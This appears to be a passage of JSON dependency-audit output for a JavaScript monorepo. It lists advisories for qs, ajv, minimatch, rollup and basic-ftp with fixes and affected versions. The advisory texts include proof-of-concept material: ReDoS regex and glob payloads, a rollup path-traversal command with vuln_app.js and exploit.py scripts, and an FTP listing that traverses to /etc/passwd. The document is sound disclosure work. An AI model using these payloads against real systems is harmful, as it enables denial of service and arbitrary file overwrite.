+ ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\n\n**Fixed code:**\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n    const splitArray = val.split(',');\n    if (splitArray.length > options.arrayLimit - currentArrayLength) {  // Check against remaining limit\n        if (options.throwOnLimitExceeded) {\n            throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n        } else {\n            // Optionally convert to object or truncate, per README\n            return splitArray.slice(0, options.arrayLimit - currentArrayLength);\n        }\n    }\n    return splitArray;\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThis aligns behavior with indexed and bracket notations, reuses `currentArrayLength`, and respects `throwOnLimitExceeded`. Update README to note the consistent enforcement.",
      "reported_by": null,
      "title": "qs's arrayLimit bypass in comma parsing allows denial of service",
      "metadata": null,
      "cves": [
        "CVE-2026-2391"
      ],
      "access": "public",
      "severity": "low",
      "module_name": "qs",
      "vulnerable_versions": ">=6.7.0 <=6.14.1",
      "github_advisory_id": "GHSA-w7fw-mjwx-w883",
      "recommendation": "Upgrade to version 6.14.2 or later",
      "patched_versions": ">=6.14.2",
      "updated": "2026-02-12T20:08:00.000Z",
      "cvss": {
        "score": 3.7,
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
      },
      "cwe": [
        "CWE-20"
      ],
      "url": "https://github.com/advisories/GHSA-w7fw-mjwx-w883"
    },
    "1113428": {
      "findings": [
        {
          "version": "6.12.6",
          "paths": [
            "packages__ui>eslint>ajv"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://nvd.nist.gov/vuln/detail/CVE-2025-69873\n- https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md\n- https://github.com/ajv-validator/ajv/pull/2586\n- https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5\n- https://github.com/ajv-validator/ajv/releases/tag/v8.18.0\n- https://github.com/ajv-validator/ajv/pull/2588\n- https://github.com/ajv-validator/ajv/releases/tag/v6.14.0\n- https://github.com/advisories/GHSA-2g4f-4pwh-qvx6",
      "created": "2026-02-11T21:30:39.000Z",
      "id": 1113428,
      "npm_advisory_id": null,
      "overview": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.",
      "reported_by": null,
      "title": "ajv has ReDoS when using `$data` option",
      "metadata": null,
      "cves": [
        "CVE-2025-69873"
      ],
      "access": "public",
      "severity": "moderate",
      "module_name": "ajv",
      "vulnerable_versions": "<6.14.0",
      "github_advisory_id": "GHSA-2g4f-4pwh-qvx6",
      "recommendation": "Upgrade to version 6.14.0 or later",
      "patched_versions": ">=6.14.0",
      "updated": "2026-02-23T22:40:32.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-400",
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6"
    },
    "1113459": {
      "findings": [
        {
          "version": "3.1.2",
          "paths": [
            ".>@turbo/gen>node-plop>del>rimraf>glob>minimatch"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
      "created": "2026-02-18T22:38:11.000Z",
      "id": 1113459,
      "npm_advisory_id": null,
      "overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) ΓÇö exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
      "reported_by": null,
      "title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
      "metadata": null,
      "cves": [
        "CVE-2026-26996"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "minimatch",
      "vulnerable_versions": "<3.1.3",
      "github_advisory_id": "GHSA-3ppc-4f35-3m26",
      "recommendation": "Upgrade to version 3.1.3 or later",
      "patched_versions": ">=3.1.3",
      "updated": "2026-02-24T20:59:58.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
    },
    "1113465": {
      "findings": [
        {
          "version": "9.0.0",
          "paths": [
            ".>@turbo/gen>minimatch"
          ]
        },
        {
          "version": "9.0.5",
          "paths": [
            "sites__mainweb>typescript-eslint>@typescript-eslint/typescript-estree>minimatch"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
      "created": "2026-02-18T22:38:11.000Z",
      "id": 1113465,
      "npm_advisory_id": null,
      "overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) ΓÇö exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
      "reported_by": null,
      "title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
      "metadata": null,
      "cves": [
        "CVE-2026-26996"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "minimatch",
      "vulnerable_versions": ">=9.0.0 <9.0.6",
      "github_advisory_id": "GHSA-3ppc-4f35-3m26",
      "recommendation": "Upgrade to version 9.0.6 or later",
      "patched_versions": ">=9.0.6",
      "updated": "2026-02-24T20:59:58.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
    },
    "1113466": {
      "findings": [
        {
          "version": "10.1.1",
          "paths": [
            ".>minimatch"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
      "created": "2026-02-18T22:38:11.000Z",
      "id": 1113466,
      "npm_advisory_id": null,
      "overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) ΓÇö exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
      "reported_by": null,
      "title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
      "metadata": null,
      "cves": [
        "CVE-2026-26996"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "minimatch",
      "vulnerable_versions": ">=10.0.0 <10.2.1",
      "github_advisory_id": "GHSA-3ppc-4f35-3m26",
      "recommendation": "Upgrade to version 10.2.1 or later",
      "patched_versions": ">=10.2.1",
      "updated": "2026-02-24T20:59:58.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
    },
    "1113515": {
      "findings": [
        {
          "version": "4.57.1",
          "paths": [
            "packages__api>vitest>vite>rollup"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc",
      "created": "2026-02-25T22:37:26.000Z",
      "id": 1113515,
      "npm_advisory_id": null,
      "overview": "### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1.  **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n    ```typescript\n    // src/utils/sanitizeFileName.ts (Line 3)\n    const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n    ```\n    This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2.  **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n    ```typescript\n    // src/rollup/rollup.ts (Line 317)\n    const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n    ```\n    Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1.  Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2.  Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n    ```bash\n    rollup --input \"a/../../pwned.js=main.js\" --dir dist\n    ```\n3.  **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n*   `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n*   `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n    // The vulnerability: Rollup's regex fails to strip dots and slashes, \n    // allowing path traversal sequences like '../'\n    return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n    const outputDir = path.join(__dirname, 'dist');\n    const fileName = sanitize(userSuppliedName);\n\n    // Vulnerability: path.resolve() follows traversal sequences in the filename\n    const outputPath = path.resolve(outputDir, fileName);\n\n    console.log(`[*] Target write path: ${outputPath}`);\n\n    if (!fs.existsSync(path.dirname(outputPath))) {\n        fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n    }\n\n    fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n    console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n    # Target a file outside the 'dist' folder\n    poc_dir = Path(__file__).parent\n    malicious_filename = \"../pwned_by_rollup.js\"\n    target_path = poc_dir / \"pwned_by_rollup.js\"\n\n    print(f\"=== Rollup Path Traversal PoC ===\")\n    print(f\"[*] Malicious Filename: {malicious_filename}\")\n    \n    # Trigger the vulnerable app\n    subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n    if target_path.exists():\n        print(f\"[SUCCESS] File escaped 'dist' folder!\")\n        print(f\"[SUCCESS] Created: {target_path}\")\n        # target_path.unlink() # Cleanup\n    else:\n        print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n    run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n*   **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n*   **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n*   **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.",
      "reported_by": null,
      "title": "Rollup 4 has Arbitrary File Write via Path Traversal",
      "metadata": null,
      "cves": [
        "CVE-2026-27606"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "rollup",
      "vulnerable_versions": ">=4.0.0 <4.59.0",
      "github_advisory_id": "GHSA-mw96-cpmx-2vgc",
      "recommendation": "Upgrade to version 4.59.0 or later",
      "patched_versions": ">=4.59.0",
      "updated": "2026-02-25T22:37:27.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-22"
      ],
      "url": "https://github.com/advisories/GHSA-mw96-cpmx-2vgc"
    },
    "1113518": {
      "findings": [
        {
          "version": "5.1.0",
          "paths": [
            ".>@turbo/gen>proxy-agent>pac-proxy-agent>get-uri>basic-ftp"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27699\n- https://github.com/patrickjuchli/basic-ftp/commit/2a2a0e6514357b9eda07c2f8afbd3f04727a7cd9\n- https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.0\n- https://github.com/advisories/GHSA-5rq4-664w-9x2c",
      "created": "2026-02-25T22:34:26.000Z",
      "id": 1113518,
      "npm_advisory_id": null,
      "overview": "The `basic-ftp` library contains a path traversal vulnerability in the `downloadToDir()` method. A malicious FTP server can send directory listings with filenames containing path traversal sequences (`../`) that cause files to be written outside the intended download directory.\n\n\n## Source-to-Sink Flow\n\n```\n1. SOURCE: FTP server sends LIST response\n└─> \"-rw-r--r-- 1 user group 1024 Jan 20 12:00 ../../../etc/passwd\"\n\n2. PARSER: parseListUnix.ts:100 extracts filename\n└─> file.name = \"../../../etc/passwd\"\n\n3. VALIDATION: parseListUnix.ts:101 checks\n└─> if (name === \".\" || name === \"..\") ❌ (only filters exact matches)\n└─> \"../../../etc/passwd\" !== \".\" && !== \"..\" ✅ PASSES\n\n4. SINK: Client.ts:707 uses filename directly\n└─> const localPath = join(localDirPath, file.name)\n└─> join(\"/safe/download\", \"../../../etc/passwd\")\n└─> Result: \"/safe/download/../../../etc/passwd\" → resolves to \"/etc/passwd\"\n\n5. FILE WRITE: Client.ts:512 opens file\n└─> fsOpen(localPath, \"w\") → writes to /etc/passwd (outside intended directory)\n```\n\n## Vulnerable Code\n\n**File**: `src/Client.ts:707`\n\n```typescript\nprotected async _downloadFromWorkingDir(localDirPath: string): Promise<void> {\nawait ensureLocalDirectory(localDirPath)\nfor (const file of await this.list()) {\nconst localPath = join(localDirPath, file.name) // ⚠️ VULNERABLE\n// file.name comes from untrusted FTP server, no sanitization\nawait this.downloadTo(localPath, file.name)\n}\n}\n```\n\n**Root Cause**:\n- Parser validation (`parseListUnix.ts:101`) only filters exact `.` or `..` entries\n- No sanitization of `../` sequences in filenames\n- `path.join()` doesn't prevent traversal, `fs.open()` resolves paths\n\n\n# Impact\n\nA malicious FTP server can:\n- Write files to arbitrary locations on the client filesystem\n- Overwrite critical system files (if user has write access)\n- Potentially achieve remote code execution\n\n## Affected Versions\n\n- **Tested**: v5.1.0\n- **Likely**: All versions (code pattern exists since initial implementation)\n\n## Mitigation\n\n**Workaround**: Do not use `downloadToDir()` with untrusted FTP servers.\n\n**Fix**: Sanitize filenames before use:\n\n```typescript\nimport { basename } from 'path'\n\n// In _downloadFromWorkingDir:\nconst sanitizedName = basename(file.name) // Strip path components\nconst localPath = join(localDirPath, sanitizedName)\n```",
      "reported_by": null,
      "title": "Basic FTP has Path Traversal Vulnerability in its downloadToDir() method",
      "metadata": null,
      "cves": [
        "CVE-2026-27699"
      ],
      "access": "public",
      "severity": "critical",
      "module_name": "basic-ftp",
      "vulnerable_versions": "<5.2.0",
      "github_advisory_id": "GHSA-5rq4-664w-9x2c",
      "recommendation": "Upgrade to version 5.2.0 or later",
      "patched_versions": ">=5.2.0",
      "updated": "2026-02-25T22:34:27.000Z",
      "cvss": {
        "score": 9.1,
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
      },
      "cwe": [
        "CWE-22"
      ],
      "url": "https://github.com/advisories/GHSA-5rq4-664w-9x2c"
    }
  },
  "muted": [],
  "metadata": {
    "vulnerabilities": {
      "info": 0,
      "low": 2,
      "moderate": 6,
      "high": 9,
      "critical": 1
    },
    "dependencies": 924,
    "devDependencies": 0,
    "optionalDependencies": 0,
    "totalDependencies": 924
  }
}